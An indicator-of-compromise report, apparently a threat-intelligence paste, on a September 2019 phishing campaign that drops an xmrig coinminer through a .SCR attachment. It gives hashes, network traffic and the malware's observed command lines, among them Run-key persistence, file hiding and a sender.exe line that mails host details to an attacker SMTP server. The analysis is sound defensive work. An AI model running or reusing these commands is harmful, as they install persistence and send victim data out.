VRad

#coinminer_020919

Sep 2nd, 2019
#IOC #OptiData #VR #xmrig #bmcon #coinminer #SCR #UPX

https://pastebin.com/LjHZHhc4

previous_contact:
https://pastebin.com/eTPuCkhC

FAQ:
https://github.com/xmrig/xmrig

attack_vector
--------------
email attach .RAR > .SCR > C:\Intel\*.exe

email_headers
--------------
Received: from s02.spamexperts.axc.nl (s02.spamexperts.axc.nl [185.182.56.112])
Received: from vserver384.axc.nl ([185.182.56.51])
Received: from [185.155.99.35] (helo=46-211-54-11.mobile.kyivstar.net)
From: Бухгалтерія <mail@fin-director.nl>
Subject: Доброго дня
To: "user00" <user00@victim1.com>
Date: Mon, 2 Sep 2019 05:14:31 +0300
X-Originating-IP: 185.182.56.51
X-SpamExperts-Domain: vserver384.axc.nl

files
--------------
SHA-256 021db462fbc53a63aa08361ac18e5854ef70ba14151d108f74672540d3c880e9
File name 1C - плaтiжнe дopучeння №47620205757176 - 2019.rar [RAR archive data, v34]
File size 983.41 KB (1007012 bytes)

SHA-256 067f96ee758cc572a281bc7608e6619a50f43bf94f66245578967dadf414ca8b
File name 1C - плaтiжнe дopучeння №47620205757176 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 1.02 MB (1066275 bytes)

SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
File name bmcon.exe [PE32 executable (console) Intel 80386, for MS Windows, UPX compressed]
File size 354.5 KB (363008 bytes)

SHA-256 d782ffbccbae28228a49fbf86e5c62966f7f9f507c9054fee462c2d53f84cd94
File name bmcon.exe [PE32 executable (console) Intel 80386, for MS Windows]
File size 1.31 MB (1370624 bytes)


activity
**************

netwrk
--------------
[ssl]
88.99.38.225 dl.browsermine.com Client Hello

[http]
13.107.4.50 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?698df6719eccbc04 HTTP/1.1 Microsoft-CryptoAPI/6.1
77.120.60.192 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1 Microsoft-CryptoAPI/6.1
77.120.60.187 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgOEzWC36QVDJo6DaBgPQDAh%2Bw%3D%3D HTTP/1.1 Microsoft-CryptoAPI/6.1
93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b835bcf15aa1abf HTTP/1.1 Microsoft-CryptoAPI/6.1
77.120.60.201 crl.microsoft.com GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1 Microsoft-CryptoAPI/6.1


comp
--------------
bmcon.exe 2308 TCP localhost 49248 88.99.38.225 443 ESTABLISHED
bmcon.exe 2308 TCP localhost 49249 13.107.4.50 80 ESTABLISHED
bmcon.exe 2308 TCP localhost 49250 77.120.60.192 80 ESTABLISHED
bmcon.exe 2308 TCP localhost 49251 77.120.60.187 80 ESTABLISHED
bmcon.exe 2308 TCP localhost 49252 88.99.38.225 443 ESTABLISHED
bm-xmrig.exe 2696 TCP localhost 49253 159.69.189.115 4444 ESTABLISHED

proc
--------------
"C:\Users\operator\Desktop\1C - плaтiжнe дopучeння №47620205757176 - 2019.scr" /S
"C:\Users\operator\Desktop\1C - плaтiжнe дopучeння №47620205757176 - 2019.scr" /S
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\Intel\enable.cmd" "
C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
C:\Windows\SysWOW64\powercfg.exe powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe powercfg -h off
C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel
C:\Windows\SysWOW64\attrib.exe C:\Windows\SysWOW64\attrib.exe
C:\Windows\SysWOW64\cmd.exe /c ver

C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
C:\Windows\SysWOW64\Wbem\WMIC.exe WMIC CPU Get Name /Value

C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
C:\Windows\SysWOW64\Wbem\WMIC.exe WMIC /Node:localhost Path Win32_VideoController Get Name /Value

C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\sender.rar sender.exe C:\ntel\sender.exe /y
C:\Intel\sender.exe -to recipient@office-center.site -f "Robot4<sender2@office-center.site>" -server smtp.office-center.site -port 587 -u sender2@office-center.site -pw epsiloneridana -subject "host1/user1" -body "OS-WindowsX x64/CPU-Intel(R) CPU @ 2.20GHz/Cores-2/GPU-VGA"

C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\privat.exe" /f

C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\sender.rar privat.exe C:\ntel\privat.exe /y

C:\Windows\SysWOW64\PING.EXE ping -n 3600 127.0.0.1

"C:\Intel\driver.exe" e -hplimpid2903392 C:\Intel\sender.rar bmcon.exe C:\ntel\bmcon.exe /y

"C:\Intel\bmcon.exe"
"C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
"C:\Intel\bmcon\bm-xmrig.exe"

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 02.09.2019 13:29

1) BMCon
c:\intel\bmcon.exe 03.11.2018 3:42

2) private 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
c:\intel\privat.exe 20.06.1992 1:22

drop
--------------
C:\Intel\bmcon.exe
C:\Intel\bmcon.json
C:\Intel\driver.exe
C:\Intel\privat.exe
C:\Intel\sender.exe
C:\Intel\sender.rar
...
C:\Intel\bmcon\apps.json
C:\Intel\bmcon\bmstart.exe
C:\Intel\bmcon\bm-xmrig.exe
C:\Intel\bmcon\bm-xmrig.json

# # #
https://www.virustotal.com/gui/file/021db462fbc53a63aa08361ac18e5854ef70ba14151d108f74672540d3c880e9/details
https://www.virustotal.com/gui/file/067f96ee758cc572a281bc7608e6619a50f43bf94f66245578967dadf414ca8b/details
https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
https://www.virustotal.com/gui/file/d782ffbccbae28228a49fbf86e5c62966f7f9f507c9054fee462c2d53f84cd94/details
https://analyze.intezer.com/#/analyses/8b188ab9-9120-46ae-80b9-a811dd9d73e2
https://analyze.intezer.com/#/analyses/2b2add43-448a-4c8e-984c-b49c805873a3
https://analyze.intezer.com/#/analyses/cba2a28c-10df-491c-b5f9-7e974cde1df0

VR

@